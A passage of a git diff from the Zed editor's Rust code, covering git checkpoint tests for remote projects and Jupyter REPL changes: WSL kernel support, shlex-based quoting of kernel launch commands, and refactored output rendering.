repository + .update(cx, |repository, _| repository.checkpoint()) .await .unwrap() .unwrap(); - // src/lib.rs: worktree 3 lines vs HEAD 2 lines - let stat = stats.get(&repo_path("src/lib.rs")).expect("src/lib.rs"); - assert_eq!((stat.added, stat.deleted), (3, 2)); - - // src/new_file.rs: only in worktree (2 lines) - let stat = stats - .get(&repo_path("src/new_file.rs")) - .expect("src/new_file.rs"); - assert_eq!((stat.added, stat.deleted), (2, 0)); + // 2. Modify a file on the server-side fs + fs.write( + Path::new(path!("/code/project1/file.txt")), + b"modified content", + ) + .await + .unwrap(); - // src/deleted.rs: only in HEAD (1 line) - let stat = stats - .get(&repo_path("src/deleted.rs")) - .expect("src/deleted.rs"); - assert_eq!((stat.added, stat.deleted), (0, 1)); + // 3. 
Create a second checkpoint with the modified state + let checkpoint_2 = repository + .update(cx, |repository, _| repository.checkpoint()) + .await + .unwrap() + .unwrap(); - // README.md: only in worktree (1 line) - let stat = stats.get(&repo_path("README.md")).expect("README.md"); - assert_eq!((stat.added, stat.deleted), (1, 0)); + // 4. compare_checkpoints: same checkpoint with itself => equal + let equal = repository + .update(cx, |repository, _| { + repository.compare_checkpoints(checkpoint_1.clone(), checkpoint_1.clone()) + }) + .await + .unwrap() + .unwrap(); + assert!(equal, "a checkpoint compared with itself should be equal"); - // --- HeadToIndex --- - let stats = cx - .update(|cx| repository.update(cx, |repo, cx| repo.diff_stat(DiffType::HeadToIndex, cx))) + // 5. compare_checkpoints: different states => not equal + let equal = repository + .update(cx, |repository, _| { + repository.compare_checkpoints(checkpoint_1.clone(), checkpoint_2.clone()) + }) .await .unwrap() .unwrap(); + assert!( + !equal, + "checkpoints of different states should not be equal" + ); - // src/lib.rs: index 4 lines vs HEAD 2 lines - let stat = stats.get(&repo_path("src/lib.rs")).expect("src/lib.rs"); - assert_eq!((stat.added, stat.deleted), (4, 2)); - - // src/staged_only.rs: only in index (2 lines) - let stat = stats - .get(&repo_path("src/staged_only.rs")) - .expect("src/staged_only.rs"); - assert_eq!((stat.added, stat.deleted), (2, 0)); - - // src/deleted.rs: in HEAD but not in index - let stat = stats - .get(&repo_path("src/deleted.rs")) - .expect("src/deleted.rs"); - assert_eq!((stat.added, stat.deleted), (0, 1)); - - // --- MergeBase (not implemented in FakeGitRepository) --- - let stats = cx - .update(|cx| { - repository.update(cx, |repo, cx| { - repo.diff_stat( - DiffType::MergeBase { - base_ref: "main".into(), - }, - cx, - ) - }) + // 6. 
diff_checkpoints: same checkpoint => empty diff + let diff = repository + .update(cx, |repository, _| { + repository.diff_checkpoints(checkpoint_1.clone(), checkpoint_1.clone()) }) .await .unwrap() .unwrap(); + assert!( + diff.is_empty(), + "diff of identical checkpoints should be empty" + ); + // 7. diff_checkpoints: different checkpoints => non-empty diff mentioning the changed file + let diff = repository + .update(cx, |repository, _| { + repository.diff_checkpoints(checkpoint_1.clone(), checkpoint_2.clone()) + }) + .await + .unwrap() + .unwrap(); + assert!( + !diff.is_empty(), + "diff of different checkpoints should be non-empty" + ); + assert!( + diff.contains("file.txt"), + "diff should mention the changed file" + ); + assert!( + diff.contains("original content"), + "diff should contain removed content" + ); assert!( - stats.is_empty(), - "MergeBase diff_stat should return empty from FakeGitRepository" + diff.contains("modified content"), + "diff should contain added content" ); + + // 8. restore_checkpoint: restore to original state + repository + .update(cx, |repository, _| { + repository.restore_checkpoint(checkpoint_1.clone()) + }) + .await + .unwrap() + .unwrap(); + cx.run_until_parked(); + + // 9. Create a checkpoint after restore + let checkpoint_3 = repository + .update(cx, |repository, _| repository.checkpoint()) + .await + .unwrap() + .unwrap(); + + // 10. compare_checkpoints: restored state matches original + let equal = repository + .update(cx, |repository, _| { + repository.compare_checkpoints(checkpoint_1.clone(), checkpoint_3.clone()) + }) + .await + .unwrap() + .unwrap(); + assert!(equal, "restored state should match original checkpoint"); + + // 11. 
diff_checkpoints: restored state vs original => empty diff + let diff = repository + .update(cx, |repository, _| { + repository.diff_checkpoints(checkpoint_1.clone(), checkpoint_3.clone()) + }) + .await + .unwrap() + .unwrap(); + assert!(diff.is_empty(), "diff after restore should be empty"); } #[gpui::test] @@ -2065,27 +2168,12 @@ async fn test_remote_agent_fs_tool_calls(cx: &mut TestAppContext, server_cx: &mu let action_log = cx.new(|_| action_log::ActionLog::new(project.clone())); - // Create a minimal thread for the ReadFileTool - let context_server_registry = - cx.new(|cx| agent::ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let input = ReadFileToolInput { path: "project/b.txt".into(), start_line: None, end_line: None, }; - let read_tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let read_tool = Arc::new(ReadFileTool::new(project, action_log, true)); let (event_stream, _) = ToolCallEventStream::test(); let exists_result = cx.update(|cx| { @@ -2170,7 +2258,6 @@ async fn test_remote_external_agent_server( .get_command( HashMap::from_iter([("OTHER_VAR".into(), "other-val".into())]), None, - None, &mut cx.to_async(), ) }) diff --git a/crates/repl/Cargo.toml b/crates/repl/Cargo.toml index 7bf63657bdea126d7a3f77681e587521356f9eb1..5477c1c5107e7450ad2eaeaba6a880256b62f30f 100644 --- a/crates/repl/Cargo.toml +++ b/crates/repl/Cargo.toml @@ -47,11 +47,13 @@ runtimelib.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true +shlex.workspace = true smol.workspace = true telemetry.workspace = true terminal.workspace = true terminal_view.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true 
util.workspace = true uuid.workspace = true @@ -61,7 +63,6 @@ zed_actions.workspace = true [dev-dependencies] editor = { workspace = true, features = ["test-support"] } -env_logger.workspace = true gpui = { workspace = true, features = ["test-support"] } http_client = { workspace = true, features = ["test-support"] } indoc.workspace = true diff --git a/crates/repl/src/components/kernel_options.rs b/crates/repl/src/components/kernel_options.rs index 3b9535767b64dd3e674020035778dffad1601fc6..ce68a4d30285fe04427c54aa8d5fbdc3aa059648 100644 --- a/crates/repl/src/components/kernel_options.rs +++ b/crates/repl/src/components/kernel_options.rs @@ -27,6 +27,7 @@ fn build_grouped_entries(store: &ReplStore, worktree_id: WorktreeId) -> Vec Vec { + KernelSpecification::JupyterServer(_) | KernelSpecification::SshRemote(_) => { remote_kernels.push(KernelPickerEntry::Kernel { spec: spec.clone(), is_recommended, }); } + KernelSpecification::WslRemote(_) => { + wsl_kernels.push(KernelPickerEntry::Kernel { + spec: spec.clone(), + is_recommended, + }); + } } } @@ -105,6 +110,12 @@ fn build_grouped_entries(store: &ReplStore, worktree_id: WorktreeId) -> Vec None, + KernelSpecification::WslRemote(_) => Some(spec.path().to_string()), KernelSpecification::PythonEnv(_) | KernelSpecification::JupyterServer(_) - | KernelSpecification::SshRemote(_) - | KernelSpecification::WslRemote(_) => { + | KernelSpecification::SshRemote(_) => { let env_kind = spec.environment_kind_label(); let path = spec.path(); match env_kind { @@ -420,10 +431,11 @@ impl PickerDelegate for KernelPickerDelegate { .gap_4() .child( Button::new("kernel-docs", "Kernel Docs") - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .icon_position(IconPosition::End) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(move |_, _, cx| cx.open_url(KERNEL_DOCS_URL)), ) .into_any(), @@ -437,7 +449,9 @@ where TT: Fn(&mut Window, &mut App) 
-> AnyView + 'static, { fn render(self, window: &mut Window, cx: &mut App) -> impl IntoElement { - let store = ReplStore::global(cx).read(cx); + let store = ReplStore::global(cx); + store.update(cx, |store, cx| store.ensure_kernelspecs(cx)); + let store = store.read(cx); let all_entries = build_grouped_entries(store, self.worktree_id); let selected_kernelspec = store.active_kernelspec(self.worktree_id, None, cx); diff --git a/crates/repl/src/kernels/mod.rs b/crates/repl/src/kernels/mod.rs index 9ec2ddb497f8c265b51dcfce58d0946d331d87d2..9f08876cd39f4b7441d8c97bd1d5344b944b09ff 100644 --- a/crates/repl/src/kernels/mod.rs +++ b/crates/repl/src/kernels/mod.rs @@ -9,6 +9,7 @@ pub use native_kernel::*; mod remote_kernels; use project::{Project, ProjectPath, Toolchains, WorktreeId}; +use remote::RemoteConnectionOptions; pub use remote_kernels::*; mod ssh_kernel; @@ -176,6 +177,13 @@ impl PythonEnvKernelSpecification { kernelspec: self.kernelspec.clone(), } } + + pub fn is_uv(&self) -> bool { + matches!( + self.environment_kind.as_deref(), + Some("uv" | "uv (Workspace)") + ) + } } #[derive(Debug, Clone, PartialEq, Eq)] @@ -238,7 +246,7 @@ impl KernelSpecification { Self::PythonEnv(spec) => spec.name.clone().into(), Self::JupyterServer(spec) => spec.name.clone().into(), Self::SshRemote(spec) => spec.name.clone().into(), - Self::WslRemote(spec) => spec.name.clone().into(), + Self::WslRemote(spec) => spec.kernelspec.display_name.clone().into(), } } @@ -262,7 +270,7 @@ impl KernelSpecification { Self::PythonEnv(spec) => spec.path.to_string_lossy().into_owned(), Self::JupyterServer(spec) => spec.url.to_string(), Self::SshRemote(spec) => spec.path.to_string(), - Self::WslRemote(_) => "WSL".to_string(), + Self::WslRemote(spec) => spec.distro.clone(), }) } @@ -348,7 +356,16 @@ pub fn python_env_kernel_specifications( ) -> impl Future>> + use<> { let python_language = LanguageName::new_static("Python"); let is_remote = project.read(cx).is_remote(); - 
log::info!("python_env_kernel_specifications: is_remote: {}", is_remote); + let wsl_distro = project + .read(cx) + .remote_connection_options(cx) + .and_then(|opts| { + if let RemoteConnectionOptions::Wsl(wsl) = opts { + Some(wsl.distro_name) + } else { + None + } + }); let toolchains = project.read(cx).available_toolchains( ProjectPath { @@ -383,6 +400,7 @@ pub fn python_env_kernel_specifications( .flatten() .chain(toolchains.toolchains) .map(|toolchain| { + let wsl_distro = wsl_distro.clone(); background_executor.spawn(async move { // For remote projects, we assume python is available assuming toolchain is reported. // We can skip the `ipykernel` check or run it remotely. @@ -390,10 +408,6 @@ pub fn python_env_kernel_specifications( // `new_smol_command` runs locally. We need to run remotely if `is_remote`. if is_remote { - log::info!( - "python_env_kernel_specifications: returning SshRemote for toolchain {}", - toolchain.name - ); let default_kernelspec = JupyterKernelspec { argv: vec![ toolchain.path.to_string(), @@ -409,6 +423,22 @@ pub fn python_env_kernel_specifications( env: None, }; + if let Some(distro) = wsl_distro { + log::debug!( + "python_env_kernel_specifications: returning WslRemote for toolchain {}", + toolchain.name + ); + return Some(KernelSpecification::WslRemote(WslKernelSpecification { + name: toolchain.name.to_string(), + kernelspec: default_kernelspec, + distro, + })); + } + + log::debug!( + "python_env_kernel_specifications: returning SshRemote for toolchain {}", + toolchain.name + ); return Some(KernelSpecification::SshRemote( SshRemoteKernelSpecification { name: format!("Remote {}", toolchain.name), @@ -480,11 +510,11 @@ pub fn python_env_kernel_specifications( }); #[allow(unused_mut)] - let mut kernel_specs: Vec = futures::future::join_all(kernelspecs) - .await - .into_iter() - .flatten() - .collect(); + let mut kernel_specs: Vec = futures::stream::iter(kernelspecs) + .buffer_unordered(4) + .filter_map(|x| async move { x }) + 
.collect::>() + .await; #[cfg(target_os = "windows")] if kernel_specs.is_empty() && !is_remote { diff --git a/crates/repl/src/kernels/native_kernel.rs b/crates/repl/src/kernels/native_kernel.rs index daefe99fef81b26f9bb9977a70075285fb4b4821..d7ee106cab6f1769b42e6958a69e39bffec44b3a 100644 --- a/crates/repl/src/kernels/native_kernel.rs +++ b/crates/repl/src/kernels/native_kernel.rs @@ -19,7 +19,7 @@ use std::{ path::PathBuf, sync::Arc, }; -use util::command::Command; + use uuid::Uuid; use super::{KernelSession, RunningKernel, start_kernel_tasks}; @@ -41,7 +41,7 @@ impl Eq for LocalKernelSpecification {} impl LocalKernelSpecification { #[must_use] - fn command(&self, connection_path: &PathBuf) -> Result { + fn command(&self, connection_path: &PathBuf) -> Result { let argv = &self.kernelspec.argv; anyhow::ensure!(!argv.is_empty(), "Empty argv in kernelspec {}", self.name); @@ -52,7 +52,7 @@ impl LocalKernelSpecification { self.name ); - let mut cmd = util::command::new_command(&argv[0]); + let mut cmd = util::command::new_std_command(&argv[0]); for arg in &argv[1..] 
{ if arg == "{connection_file}" { @@ -91,7 +91,7 @@ async fn peek_ports(ip: IpAddr) -> Result<[u16; 5]> { } pub struct NativeRunningKernel { - pub process: util::command::Child, + pub process: util::process::Child, connection_path: PathBuf, _process_status_task: Option>, pub working_directory: PathBuf, @@ -104,7 +104,7 @@ pub struct NativeRunningKernel { impl Debug for NativeRunningKernel { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { f.debug_struct("RunningKernel") - .field("process", &self.process) + .field("process", &*self.process) .finish() } } @@ -146,15 +146,14 @@ impl NativeRunningKernel { fs.atomic_write(connection_path.clone(), content).await?; let mut cmd = kernel_specification.command(&connection_path)?; - - let mut process = cmd - .current_dir(&working_directory) - .stdout(util::command::Stdio::piped()) - .stderr(util::command::Stdio::piped()) - .stdin(util::command::Stdio::piped()) - .kill_on_drop(true) - .spawn() - .context("failed to start the kernel process")?; + cmd.current_dir(&working_directory); + + let mut process = util::process::Child::spawn( + cmd, + std::process::Stdio::piped(), + std::process::Stdio::piped(), + std::process::Stdio::piped(), + )?; let session_id = Uuid::new_v4().to_string(); diff --git a/crates/repl/src/kernels/wsl_kernel.rs b/crates/repl/src/kernels/wsl_kernel.rs index 1cdb774008d6a40e57b0abeeec73e294896c221a..d9ac05c5fc8c2cb756898ff449d6714b78cb7997 100644 --- a/crates/repl/src/kernels/wsl_kernel.rs +++ b/crates/repl/src/kernels/wsl_kernel.rs @@ -21,6 +21,7 @@ use std::{ path::PathBuf, sync::Arc, }; + use uuid::Uuid; // Find a set of open ports. This creates a listener with port set to 0. The listener will be closed at the end when it goes out of scope. 
@@ -56,6 +57,15 @@ impl Debug for WslRunningKernel { } } +fn quote_posix_shell_arguments(arguments: &[String]) -> Result { + let mut quoted_arguments = Vec::with_capacity(arguments.len()); + for argument in arguments { + let quoted = shlex::try_quote(argument).map(|quoted| quoted.into_owned())?; + quoted_arguments.push(quoted); + } + Ok(quoted_arguments.join(" ")) +} + impl WslRunningKernel { pub fn new( kernel_specification: WslKernelSpecification, @@ -129,9 +139,8 @@ impl WslRunningKernel { // `wsl -d --exec ...` // But we need to replace {connection_file} with wsl_connection_path. - let argv = kernel_specification.kernelspec.argv; anyhow::ensure!( - !argv.is_empty(), + !kernel_specification.kernelspec.argv.is_empty(), "Empty argv in kernelspec {}", kernel_specification.name ); @@ -182,50 +191,57 @@ impl WslRunningKernel { // We use bash -lc to run in a login shell for proper environment setup let mut kernel_args: Vec = Vec::new(); - if let Some(env) = &kernel_specification.kernelspec.env { - if !env.is_empty() { - kernel_args.push("env".to_string()); - for (k, v) in env { - kernel_args.push(format!("{}={}", k, v)); + let resolved_argv: Vec = kernel_specification + .kernelspec + .argv + .iter() + .map(|arg| { + if arg == "{connection_file}" { + wsl_connection_path.clone() + } else { + arg.clone() } + }) + .collect(); + + let executable = resolved_argv.first().map(String::as_str); + let needs_python_resolution = executable.map_or(false, |executable| { + executable == "python" || executable == "python3" || !executable.starts_with('/') + }); + + let mut env_assignments: Vec = Vec::new(); + if let Some(env) = &kernel_specification.kernelspec.env { + env_assignments.reserve(env.len()); + for (key, value) in env { + let assignment = format!("{key}={value}"); + let assignment = shlex::try_quote(&assignment) + .map(|quoted| quoted.into_owned())?; + env_assignments.push(assignment); } - } - for arg in argv { - if arg == "{connection_file}" { - 
kernel_args.push(wsl_connection_path.clone()); - } else { - kernel_args.push(arg.clone()); + if !env_assignments.is_empty() { + kernel_args.push("env".to_string()); + kernel_args.extend(env_assignments.iter().cloned()); } } - // because first command is python/python3 we need make sure it's present in the env - let first_cmd = kernel_args.first().map(|arg| { - arg.split_whitespace().next().unwrap_or(arg) - }); - - let needs_python_resolution = first_cmd.map_or(false, |cmd| { - cmd == "python" || cmd == "python3" || !cmd.starts_with('/') - }); + kernel_args.extend(resolved_argv.iter().cloned()); let shell_command = if needs_python_resolution { // 1. Check for .venv/bin/python or .venv/bin/python3 in working directory // 2. Fall back to system python3 or python - let rest_args: Vec = kernel_args.iter().skip(1).cloned().collect(); - let rest_string = rest_args - .iter() - .map(|arg| { - if arg.contains(' ') || arg.contains('\'') || arg.contains('"') { - format!("'{}'", arg.replace('\'', "'\\''")) - } else { - arg.clone() - } - }) - .collect::>() - .join(" "); + let rest_args: Vec = resolved_argv.iter().skip(1).cloned().collect(); + let arg_string = quote_posix_shell_arguments(&rest_args)?; + let set_env_command = if env_assignments.is_empty() { + String::new() + } else { + format!("export {}; ", env_assignments.join(" ")) + }; let cd_command = if let Some(wd) = wsl_working_directory.as_ref() { - format!("cd '{}' && ", wd.replace('\'', "'\\''")) + let quoted_wd = shlex::try_quote(wd) + .map(|quoted| quoted.into_owned())?; + format!("cd {quoted_wd} && ") } else { String::new() }; @@ -233,6 +249,7 @@ impl WslRunningKernel { format!( "set -e; \ + {} \ {} \ echo \"Working directory: $(pwd)\" >&2; \ if [ -x .venv/bin/python ]; then \ @@ -254,20 +271,26 @@ impl WslRunningKernel { echo 'PATH:' \"$PATH\" >&2; \ exit 127; \ fi", - cd_command, rest_string, rest_string, rest_string, rest_string + cd_command, set_env_command, arg_string, arg_string, arg_string, arg_string ) } else 
{ - kernel_args - .iter() - .map(|arg| { - if arg.contains(' ') || arg.contains('\'') || arg.contains('"') { - format!("'{}'", arg.replace('\'', "'\\''")) - } else { - arg.clone() - } - }) - .collect::>() - .join(" ") + let args_string = quote_posix_shell_arguments(&resolved_argv)?; + + let cd_command = if let Some(wd) = wsl_working_directory.as_ref() { + let quoted_wd = shlex::try_quote(wd) + .map(|quoted| quoted.into_owned())?; + format!("cd {quoted_wd} && ") + } else { + String::new() + }; + + let env_prefix_inline = if !env_assignments.is_empty() { + format!("env {} ", env_assignments.join(" ")) + } else { + String::new() + }; + + format!("{cd_command}exec {env_prefix_inline}{args_string}") }; cmd.arg("bash") @@ -571,8 +594,20 @@ pub async fn wsl_kernel_specifications( }) }) .collect::>(); + } else if let Err(e) = + serde_json::from_str::(&json_str) + { + log::error!( + "wsl_kernel_specifications parse error: {} \nJSON: {}", + e, + json_str + ); } + } else { + log::error!("wsl_kernel_specifications command failed"); } + } else if let Err(e) = output { + log::error!("wsl_kernel_specifications command execution failed: {}", e); } Vec::new() diff --git a/crates/repl/src/notebook/cell.rs b/crates/repl/src/notebook/cell.rs index d66261698b722cfcd0f547e09d84cf83a0d2b1a6..ba70e50f8cbccc32bef5de5c1864a3d8db46aa89 100644 --- a/crates/repl/src/notebook/cell.rs +++ b/crates/repl/src/notebook/cell.rs @@ -1,20 +1,18 @@ -#![allow(unused, dead_code)] use std::sync::Arc; use std::time::{Duration, Instant}; use editor::{Editor, EditorMode, MultiBuffer, SizingBehavior}; use futures::future::Shared; use gpui::{ - App, Entity, EventEmitter, Focusable, Hsla, InteractiveElement, KeyContext, - RetainAllImageCache, StatefulInteractiveElement, Task, TextStyleRefinement, image_cache, - prelude::*, + App, Entity, EventEmitter, Focusable, Hsla, InteractiveElement, RetainAllImageCache, + StatefulInteractiveElement, Task, TextStyleRefinement, prelude::*, }; use language::{Buffer, Language, 
LanguageRegistry}; use markdown::{Markdown, MarkdownElement, MarkdownStyle}; use nbformat::v4::{CellId, CellMetadata, CellType}; use runtimelib::{JupyterMessage, JupyterMessageContent}; use settings::Settings as _; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{CommonAnimationExt, IconButtonShape, prelude::*}; use util::ResultExt; @@ -236,7 +234,7 @@ pub trait RenderableCell: Render { fn source(&self) -> &String; fn selected(&self) -> bool; fn set_selected(&mut self, selected: bool) -> &mut Self; - fn selected_bg_color(&self, window: &mut Window, cx: &mut Context) -> Hsla { + fn selected_bg_color(&self, _window: &mut Window, cx: &mut Context) -> Hsla { if self.selected() { let mut color = cx.theme().colors().element_hover; color.fade_out(0.5); @@ -253,7 +251,7 @@ pub trait RenderableCell: Render { fn cell_position_spacer( &self, is_first: bool, - window: &mut Window, + _window: &mut Window, cx: &mut Context, ) -> Option { let cell_position = self.cell_position(); @@ -328,7 +326,6 @@ pub struct MarkdownCell { editing: bool, selected: bool, cell_position: Option, - languages: Arc, _editor_subscription: gpui::Subscription, } @@ -386,7 +383,6 @@ impl MarkdownCell { let markdown = cx.new(|cx| Markdown::new(source.clone().into(), None, None, cx)); - let cell_id = id.clone(); let editor_subscription = cx.subscribe(&editor, move |this, _editor, event, cx| match event { editor::EditorEvent::Blurred => { @@ -410,7 +406,6 @@ impl MarkdownCell { editing: start_editing, selected: false, cell_position: None, - languages, _editor_subscription: editor_subscription, } } @@ -461,8 +456,6 @@ impl MarkdownCell { .unwrap_or_default(); self.source = source.clone(); - let languages = self.languages.clone(); - self.markdown.update(cx, |markdown, cx| { markdown.reset(source.into(), cx); }); @@ -606,7 +599,7 @@ pub struct CodeCell { outputs: Vec, selected: bool, cell_position: Option, - language_task: Task<()>, + _language_task: Task<()>, execution_start_time: 
Option, execution_duration: Option, is_executing: bool, @@ -670,10 +663,10 @@ impl CodeCell { outputs: Vec::new(), selected: false, cell_position: None, - language_task, execution_start_time: None, execution_duration: None, is_executing: false, + _language_task: language_task, } } @@ -748,10 +741,10 @@ impl CodeCell { outputs, selected: false, cell_position: None, - language_task, execution_start_time: None, execution_duration: None, is_executing: false, + _language_task: language_task, } } @@ -879,15 +872,7 @@ impl CodeCell { cx.notify(); } - fn output_control(&self) -> Option { - if self.has_outputs() { - Some(CellControlType::ClearCell) - } else { - None - } - } - - pub fn gutter_output(&self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + pub fn gutter_output(&self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { let is_selected = self.selected(); div() @@ -948,7 +933,7 @@ impl RenderableCell for CodeCell { &self.source } - fn control(&self, window: &mut Window, cx: &mut Context) -> Option { + fn control(&self, _window: &mut Window, cx: &mut Context) -> Option { let control_type = if self.has_outputs() { CellControlType::RerunCell } else { @@ -1038,8 +1023,7 @@ impl RenderableCell for CodeCell { } impl RunnableCell for CodeCell { - fn run(&mut self, window: &mut Window, cx: &mut Context) { - println!("Running code cell: {}", self.id); + fn run(&mut self, _window: &mut Window, cx: &mut Context) { cx.emit(CellEvent::Run(self.id.clone())); } @@ -1062,11 +1046,8 @@ impl Render for CodeCell { } else { None }; - let output_max_width = plain::max_width_for_columns( - ReplSettings::get_global(cx).output_max_width_columns, - window, - cx, - ); + let output_max_width = + plain::max_width_for_columns(ReplSettings::get_global(cx).max_columns, window, cx); // get the language from the editor's buffer let language_name = self .editor @@ -1198,41 +1179,23 @@ impl Render for CodeCell { }, ) // output at bottom - 
.child(div().w_full().children(self.outputs.iter().map( - |output| { - let content = match output { - Output::Plain { content, .. } => { - Some(content.clone().into_any_element()) - } - Output::Markdown { content, .. } => { - Some(content.clone().into_any_element()) - } - Output::Stream { content, .. } => { - Some(content.clone().into_any_element()) - } - Output::Image { content, .. } => { - Some(content.clone().into_any_element()) - } - Output::Message(message) => Some( - div() - .child(message.clone()) - .into_any_element(), - ), - Output::Table { content, .. } => { - Some(content.clone().into_any_element()) - } - Output::Json { content, .. } => { - Some(content.clone().into_any_element()) - } - Output::ErrorOutput(error_view) => { - error_view.render(window, cx) - } - Output::ClearOutputWaitMarker => None, - }; - - div().children(content) - }, - ))), + .child( + div() + .id(( + ElementId::from(self.id.to_string()), + "output-scroll", + )) + .w_full() + .when_some(output_max_width, |div, max_width| { + div.max_w(max_width).overflow_x_scroll() + }) + .when_some(output_max_height, |div, max_height| { + div.max_h(max_height).overflow_y_scroll() + }) + .children(self.outputs.iter().map(|output| { + div().children(output.content(window, cx)) + })), + ), ), ), ) diff --git a/crates/repl/src/notebook/notebook_ui.rs b/crates/repl/src/notebook/notebook_ui.rs index 5b8c0746cdf1289ac3c612139fab1819b5596c07..76a0d2a47037f0ccd48fcfe9cb088ceb9e37aeaa 100644 --- a/crates/repl/src/notebook/notebook_ui.rs +++ b/crates/repl/src/notebook/notebook_ui.rs @@ -1117,10 +1117,11 @@ impl NotebookEditor { worktree_id, Button::new("kernel-selector", kernel_name.clone()) .label_size(LabelSize::Small) - .icon(status_icon) - .icon_size(IconSize::Small) - .icon_color(status_color) - .icon_position(IconPosition::Start), + .start_icon( + Icon::new(status_icon) + .size(IconSize::Small) + .color(status_color), + ), Tooltip::text(format!( "Kernel: {} ({}). 
Click to change.", kernel_name, @@ -1514,6 +1515,9 @@ impl project::ProjectItem for NotebookItem { nbformat::upgrade_legacy_notebook(legacy_notebook)? } + nbformat::Notebook::V3(v3_notebook) => { + nbformat::upgrade_v3_notebook(v3_notebook)? + } } }; @@ -1791,6 +1795,9 @@ impl Item for NotebookEditor { Ok(nbformat::Notebook::Legacy(legacy_notebook)) => { nbformat::upgrade_legacy_notebook(legacy_notebook)? } + Ok(nbformat::Notebook::V3(v3_notebook)) => { + nbformat::upgrade_v3_notebook(v3_notebook)? + } Err(e) => { anyhow::bail!("Failed to parse notebook: {:?}", e); } diff --git a/crates/repl/src/outputs.rs b/crates/repl/src/outputs.rs index 8be8c57cceee84435a6d99ba5c611d24c563bec3..ad0bd56858636bf8fbd2501bab28aae25b99c2a0 100644 --- a/crates/repl/src/outputs.rs +++ b/crates/repl/src/outputs.rs @@ -253,18 +253,8 @@ impl Output { ) } - pub fn render( - &self, - workspace: WeakEntity, - window: &mut Window, - cx: &mut Context, - ) -> impl IntoElement + use<> { - let max_width = plain::max_width_for_columns( - ReplSettings::get_global(cx).output_max_width_columns, - window, - cx, - ); - let content = match self { + pub fn content(&self, window: &mut Window, cx: &mut App) -> Option { + match self { Self::Plain { content, .. } => Some(content.clone().into_any_element()), Self::Markdown { content, .. } => Some(content.clone().into_any_element()), Self::Stream { content, .. } => Some(content.clone().into_any_element()), @@ -274,21 +264,36 @@ impl Output { Self::Json { content, .. } => Some(content.clone().into_any_element()), Self::ErrorOutput(error_view) => error_view.render(window, cx), Self::ClearOutputWaitMarker => None, - }; + } + } - let needs_horizontal_scroll = matches!(self, Self::Table { .. } | Self::Image { .. 
}); + pub fn render( + &self, + workspace: WeakEntity, + window: &mut Window, + cx: &mut Context, + ) -> impl IntoElement + use<> { + let max_width = + plain::max_width_for_columns(ReplSettings::get_global(cx).max_columns, window, cx); + let content = self.content(window, cx); + + let needs_horizontal_scroll = matches!(self, Self::Table { .. }); h_flex() .id("output-content") .w_full() - .when_some(max_width, |this, max_w| this.max_w(max_w)) - .overflow_x_scroll() + .when_else( + needs_horizontal_scroll, + |this| this.overflow_x_scroll(), + |this| this.overflow_x_hidden(), + ) .items_start() .child( div() .when(!needs_horizontal_scroll, |el| { el.flex_1().w_full().overflow_x_hidden() }) + .when_some(max_width, |el, max_width| el.max_w(max_width)) .children(content), ) .children(match self { @@ -890,7 +895,7 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); let fs = project::FakeFs::new(cx.background_executor.clone()); let project = project::Project::test(fs, [] as [&Path; 0], cx).await; diff --git a/crates/repl/src/outputs/image.rs b/crates/repl/src/outputs/image.rs index 9d1ffa3d2065281cd69e67b2faf960c9aa690bcb..e5444be3d779c9541fcadd55b9255d3e25da0cba 100644 --- a/crates/repl/src/outputs/image.rs +++ b/crates/repl/src/outputs/image.rs @@ -3,10 +3,10 @@ use base64::{ Engine as _, alphabet, engine::{DecodePaddingMode, GeneralPurpose, GeneralPurposeConfig}, }; -use gpui::{App, ClipboardItem, Image, ImageFormat, RenderImage, Window, img}; +use gpui::{App, ClipboardItem, Image, ImageFormat, Pixels, RenderImage, Window, img}; use settings::Settings as _; use std::sync::Arc; -use ui::{IntoElement, Styled, div, prelude::*}; +use ui::{IntoElement, Styled, prelude::*}; use crate::outputs::{OutputContent, plain}; use crate::repl_settings::ReplSettings; @@ -113,7 +113,7 @@ impl Render for ImageView { let 
settings = ReplSettings::get_global(cx); let line_height = window.line_height(); - let max_width = plain::max_width_for_columns(settings.output_max_width_columns, window, cx); + let max_width = plain::max_width_for_columns(settings.max_columns, window, cx); let max_height = if settings.output_max_height_lines > 0 { Some(line_height * settings.output_max_height_lines as f32) @@ -125,7 +125,7 @@ impl Render for ImageView { let image = self.image.clone(); - div().h(height).w(width).child(img(image)) + img(image).w(width).h(height) } } diff --git a/crates/repl/src/outputs/plain.rs b/crates/repl/src/outputs/plain.rs index 0db2f811fb9ca3b82114db23826e37fe699bd3a0..bc6d04019ce0129529a886e827c3f2ec8e6574ce 100644 --- a/crates/repl/src/outputs/plain.rs +++ b/crates/repl/src/outputs/plain.rs @@ -22,12 +22,12 @@ use alacritty_terminal::{ term::Config, vte::ansi::Processor, }; -use gpui::{Bounds, ClipboardItem, Entity, FontStyle, TextStyle, WhiteSpace, canvas, size}; +use gpui::{Bounds, ClipboardItem, Entity, FontStyle, Pixels, TextStyle, WhiteSpace, canvas, size}; use language::Buffer; use settings::Settings as _; use terminal::terminal_settings::TerminalSettings; use terminal_view::terminal_element::TerminalElement; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{IntoElement, prelude::*}; use crate::outputs::OutputContent; @@ -275,7 +275,7 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); cx.add_empty_window() } diff --git a/crates/repl/src/outputs/table.rs b/crates/repl/src/outputs/table.rs index 